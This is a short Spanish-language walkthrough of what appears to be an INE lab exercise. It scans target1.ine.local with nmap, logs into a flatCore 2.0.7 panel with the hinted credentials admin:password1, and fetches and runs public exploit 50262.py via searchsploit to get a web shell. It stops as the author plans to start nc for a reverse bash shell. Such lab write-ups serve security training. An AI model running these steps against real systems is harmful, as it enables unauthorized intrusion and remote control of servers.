Tenemos dos targets: target1.ine.local y target2.ine.local
Empezamos con target1.ine.local haciendo un escaneo de los 10K primeros puertos:
nmap -sV -sC -p1-10000 target1.ine.local -oA target1_10Kscan

Vemos que el puerto 80 esta abierto, abrimos Firefox para ver que esta corriendo.

Vemos un panel de acceso, probamos con las credenciales que no da la pista:
Identify and exploit the vulnerable web application running on target1.ine.local and retrieve the flag from the root directory. The credentials admin:password1 may be useful.
Y conseguimos loggearnos, clickamos en Administration y en el footer vemos la version exacta:

Ahora vamos a buscar vulnerabilidades de este servicio (flatcore ):
searchsploit flatcore 2.0.7

Descargamos el exploit:
searchsploit -m 50262.py
Analizamos su contenido para ver si hay que modificar algo y ver como se usa.
Ahora lo ejecutamos:
python3 50262.py '<http://target1.ine.local>' 'admin' 'password1'

Estamos dentro pero esta shell http no nos deja hacer absolutamente nada, a si que levantamos nc para enviarnos una bash.